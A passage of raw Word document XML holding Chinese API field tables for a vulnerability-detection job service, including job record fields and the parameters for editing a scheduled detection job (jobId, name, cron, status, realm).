          <w:p w14:paraId="3AA18618" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>createTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61A2074E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FFF2B35" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B294B00" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>创建时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="30E6647E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="186EE918" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>updateTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71F109EB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47167229" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4326570D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>更新时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3236DE27" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11A9F64A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cronEnabled</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="405A376B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="600CE919" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A574D21" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否定时</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="33FE9D8A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DF55EF9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49496A5F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2082985A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D1B865E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>任务表达式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="68AA72C9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49EE855C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cronTaskId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E7EE62C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45511853" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="531F0909" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cronTaskId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7A9CDC4B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E028506" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71B6289E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="744135E6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04BDA62E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5E6CDA16" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EBC222E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>realm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42781F25" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="154F9F97" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AAA32D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5752980C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10F76D7D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F3012AC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72494E83" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0155E584" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行范围名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="183F3751" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="169FECD0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>lastExecuteTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="104CAE73" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68CD1ECF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2023CB69" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>最后执行时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C39CC6E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="233" w:name="_Toc115166191"/>
      <w:bookmarkStart w:id="234" w:name="编辑漏洞检测作业请求"/>
      <w:bookmarkEnd w:id="232"/>
      <w:r>
        <w:t>编辑漏洞检测作业请求</w:t>
      </w:r>
      <w:bookmarkEnd w:id="233"/>
    </w:p>
    <w:p w14:paraId="60648607" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B76B43B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>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fix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63ECEE4F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>与新增作业相比，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jobId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>必传。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137F335B"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2330"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="4207"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="627AABE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1E1D7B1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="201C6C88" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D7C5EF7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27542776" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5568114D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="172205E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F48425D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6226910C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C975A17" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业id，必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7069552C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="146C9503" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="249D45FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4092FA10" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>255)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61901B04" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业名称，必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="20B9E545" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13F56855" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cronEnabled</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48B0355B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AFBD1E8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19B06FB3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否定时, 不传时为不定时</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="228A15BF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="169D473C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AC280FF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02DB72F5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37D5DCF3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cronEnabled</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=true时必填，</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>任务表达式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0B4ACFFF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26710519" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58DD5936" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EB4513F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="269DB58E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否启用，必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="50C954EE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="501A2115" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>realm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15740C5B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="200ABDDA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57220FE9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行范围，必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="43AAF8E7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56CC0EE5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D643843" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38CF50B6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04581F07" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行范围名称，可选</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3D610423" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="111B99F3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AEDC58F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
